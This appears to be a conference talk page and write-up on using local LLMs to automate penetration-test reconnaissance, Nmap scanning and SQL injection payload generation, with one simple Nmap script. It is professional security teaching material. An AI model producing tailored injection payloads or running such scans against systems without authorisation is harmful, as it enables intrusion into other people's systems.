Security BSides2025

Speedrun Cyber Security with AI

BSidesSLC387 views52:0910 months ago

This talk demonstrates how to integrate AI-powered tools into a penetration testing workflow to automate reconnaissance and vulnerability scanning. The speaker showcases the use of LLMs to generate custom Bash scripts for Nmap scanning, directory brute-forcing, and SQL injection testing. The presentation highlights the efficiency gains of using AI as a force multiplier while emphasizing the importance of maintaining manual oversight and security hygiene. The demo features the use of Cursor, Ollama, and T3 Chat to streamline the exploitation process against a target machine.

Automating Recon and Exploitation with Local LLMs

TLDR: This post explores how to integrate local LLMs like those run via Ollama into your penetration testing workflow to automate reconnaissance and vulnerability discovery. By using tools like Cursor and T3 Chat, you can generate and execute custom Bash scripts for Nmap scanning and SQL injection testing without leaking sensitive target data to third-party cloud providers. This approach turns AI into a force multiplier for red team engagements while maintaining strict control over your data flow.

Speed is the currency of a successful penetration test. When you are staring down a three-day engagement with a massive scope, the difference between finding a critical vulnerability and missing it often comes down to how efficiently you can filter noise and identify the low-hanging fruit. Most researchers are already using AI to write boilerplate code or explain complex payloads, but the real power lies in building a local, automated pipeline that handles the repetitive grunt work of reconnaissance and initial exploitation.

The Case for Local AI Workflows

The primary hurdle in using AI for security research is the risk of data leakage. Sending internal IP addresses, sensitive directory structures, or proprietary code snippets to public LLM endpoints is a non-starter for most professional engagements. This is why running models locally is not just a preference; it is a requirement.

By using Ollama to host models on your own hardware, you keep your reconnaissance data entirely within your local environment. When you pair this with an IDE like Cursor or a specialized interface like T3 Chat, you create a feedback loop where the AI understands your local file system and can suggest commands based on the specific context of your current scan.

Automating the Recon Pipeline

During a recent engagement, the goal was to identify potential entry points across a distributed infrastructure. Instead of manually running individual commands, the workflow involved using an LLM to generate a modular Bash script that orchestrated the entire reconnaissance phase.

The script was designed to:

Perform an initial Nmap scan to identify open ports and services.
Automatically parse the Nmap output to identify web services.
Trigger directory brute-forcing using Gobuster or Nikto based on the discovered services.

Here is a snippet of the logic used to automate the Nmap phase:

#!/bin/bash
# Nmap automation script generated via local LLM
TARGET=$1
OUTPUT_FILE="recon_scan.txt"

if [ -z "$TARGET" ]; then
    echo "Usage: ./recon_scan.sh <target_ip>"
    exit 1
fi

nmap -sS -sV -p- -T4 -oN $OUTPUT_FILE $TARGET
echo "Scan complete. Results saved to $OUTPUT_FILE"

The real advantage here is not just the script generation, but the ability to ask the LLM to analyze the output in real-time. By feeding the Nmap results back into the chat context, the AI can identify specific OWASP categories to investigate, such as A03:2021-Injection or A07:2021-Identification and Authentication Failures.

Exploitation and Payload Generation

Once the reconnaissance phase identifies a potential SQL injection point, the workflow shifts to payload generation. Rather than manually crafting complex queries, you can provide the AI with the specific error messages or behavioral patterns observed during your testing.

For example, if you encounter a login form that appears vulnerable to SQL injection, you can instruct the AI to generate a series of payloads tailored to the specific database backend identified during the service enumeration. By using Jina Reader to convert complex web documentation into clean Markdown, you can feed the AI the exact syntax requirements for the target application, ensuring the generated payloads are accurate and effective.

Managing Risk and Defensive Oversight

While AI is a force multiplier, it is not a replacement for technical expertise. The code generated by LLMs often contains subtle bugs or inefficient logic. In one instance, an AI-generated script attempted to use an incorrect flag for a directory brute-forcing tool, which would have resulted in a failed scan if not caught by manual review.

Always treat AI-generated code as untrusted input. Before executing any script against a target, perform a manual audit of the commands. Check for dangerous flags like rm -rf or unintended network connections that could trigger defensive alerts. Furthermore, be aware that LLMs can hallucinate tool features or syntax. If a command fails, do not assume the target is secure; assume the AI made a mistake and verify the tool documentation directly.

Moving Forward

The future of red teaming is not about choosing between manual testing and AI; it is about mastering the integration of both. The researchers who will succeed in the coming years are those who can build their own custom toolchains, leveraging local LLMs to handle the high-volume, repetitive tasks while reserving their cognitive bandwidth for the complex, creative exploitation paths that AI cannot yet navigate.

Start small. Pick one repetitive task in your current workflow—perhaps parsing log files or generating initial wordlists—and build a local AI agent to handle it. Once you have a reliable process, you can begin to chain these tasks together into a fully automated, local-first reconnaissance engine. The goal is to spend less time typing commands and more time analyzing the results.

Talk Type

tool demo

Difficulty

intermediate